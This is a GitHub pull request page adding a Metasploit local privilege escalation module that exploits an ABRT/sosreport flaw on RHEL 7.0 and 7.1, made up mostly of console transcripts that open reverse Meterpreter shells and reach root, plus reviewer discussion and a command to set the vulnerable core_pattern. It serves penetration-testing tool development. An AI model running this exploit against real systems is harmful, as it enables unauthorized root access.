Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ABRT sosreport Privilege Escalation module #11762

Merged
merged 4 commits into from Sep 24, 2019

Conversation

@bcoles
Copy link
Contributor

commented Apr 20, 2019

Lazy wrapper for rebel's sosreport-rhel7.py exploit.

Red Hat Enterprise Linux 7.0 (x64)

msf5 > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-12.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.DcxBT2w' (2756 bytes) ...
[*] Writing '/tmp/.HUAWYz' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.151
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.151:50843) at 2019-04-20 07:21:24 -0400
[+] Deleted /tmp/.DcxBT2w
[+] Deleted /tmp/.HUAWYz
[+] Deleted /tmp/hax.sh
[*] waiting for sosreport to finish (can take several minutes)....................

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-123.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Red Hat Enterprise Linux 7.1 (x64)

msf5 > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.gFrwiGr' (2756 bytes) ...
[*] Writing '/tmp/.NA4fwK' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.218
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.218:51022) at 2019-04-20 07:23:24 -0400
[*] waiting for sosreport to finish (can take several minutes)..............

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
bcoles added 3 commits Apr 20, 2019
@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 24, 2019

I'm looking for Redhat 7.1 but it seems their website only provides 7.2 at the minimum... could you please find me a link for 7.1?

@bcoles

This comment has been minimized.

Copy link
Contributor Author

commented May 24, 2019

I'm looking for Redhat 7.1 but it seems their website only provides 7.2 at the minimum... could you please find me a link for 7.1?

You'll need to sign up as a Red Hat developer, auth to SSO, and then navigate to the correct portal. This can be achieved in 47 simple steps.

No rush. I'll need to address the above issue before this lands.

@bcoles bcoles added the delayed label May 24, 2019
@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 24, 2019

47 steps!? Wow it's almost like they don't want you to get it.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

commented May 24, 2019

47 steps!? Wow it's almost like they don't want you to get it.

  1. Go here: https://access.redhat.com/downloads/content/69/
  2. Login
  3. Select 7.1 from the drop down
  4. Select RHEL 7.1 Binary DVD

Edit: [not shown above: the 43 steps required to register and find that link]

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 24, 2019

Thank you.

@bcoles bcoles removed the delayed label May 29, 2019
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 3, 2019

FWIW, the changes work as expected, though this is not vulnerable:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] Sending stage (3021284 bytes) to 192.168.134.103
[*] Meterpreter session 1 opened (192.168.135.168:4567 -> 192.168.134.103:57530) at 2019-06-03 16:26:14 -0500

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[*] ABRT package version 2.1.11-52.el7.centos is not vulnerable
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > 

I'm downloading a CentOS 7.0 iso right now and will try that tomorrow if this is still up.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

commented Jun 3, 2019

I'm downloading a CentOS 7.0 iso right now and will try that tomorrow if this is still up.

You'll need RHEL, not CentOS.

@h00die

This comment has been minimized.

Copy link
Contributor

commented Jul 17, 2019

Is ABRT the default? I have a 7.1 server x64 VM, and at least on it I got "System is not configured to use ABRT for crash reporting"
Re-installing my 7.0 server to check it

@bcoles

This comment has been minimized.

Copy link
Contributor Author

commented Jul 17, 2019

Is ABRT the default? I have a 7.1 server x64 VM, and at least on it I got "System is not configured to use ABRT for crash reporting"
Re-installing my 7.0 server to check it

I believe so. That seems like the kind of thing I would have documented if it weren't default.

Both my RHEL 7.0 and RHEL 7.1 had ABRT configured as the crash handler.

I checked the shell history on both test boxes and found no indication that I'd changed the core pattern.

The advisory also indicates that it is the default crash handler:

A can be used to elevate privileges from an unprivileged user to root
on a default installation of RHEL 7/7.1. RHEL 6 and lower do not seem
vulnerable by default.

Changing the core_pattern is easy if you want to check the vulnerability:

echo "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e" > /proc/sys/kernel/core_pattern

But my guess is that your RHEL 7.1 system is likely not vulnerable, as 7.1 was released on 2015-03-05 and the bug was dropped about 6 months later on 2015-11-23. If you're installed updates any time in the last 4 years it will be patched.

@space-r7 space-r7 self-assigned this Sep 24, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

commented Sep 24, 2019

Successfully tested against RHEL 7.1:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (985320 bytes) to 192.168.37.163
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.163:58254) at 2019-09-24 09:23:15 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > check

[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] The target appears to be vulnerable.
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.Zw6rGJ2' (2756 bytes) ...
[*] Writing '/tmp/.38QS1nWv' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 192.168.37.163
[*] waiting for sosreport to finish (can take several minutes)......................................................................
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.163:58255) at 2019-09-24 09:25:52 -0500
[+] Deleted /tmp/.38QS1nWv
[+] Deleted /tmp/hax.sh

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
space-r7 added a commit that referenced this pull request Sep 24, 2019
@space-r7 space-r7 merged commit ca8c72d into rapid7:master Sep 24, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Sep 24, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

commented Sep 24, 2019

Release Notes

This adds a module that attempts to gain root privileges through a symlink attack by exploiting the Automatic Bug Reporting Tool (ABRT) before v2.7.1.

@bcoles bcoles deleted the bcoles:abrt_sosreport_priv_esc branch Sep 25, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
7 participants
You can’t perform that action at this time.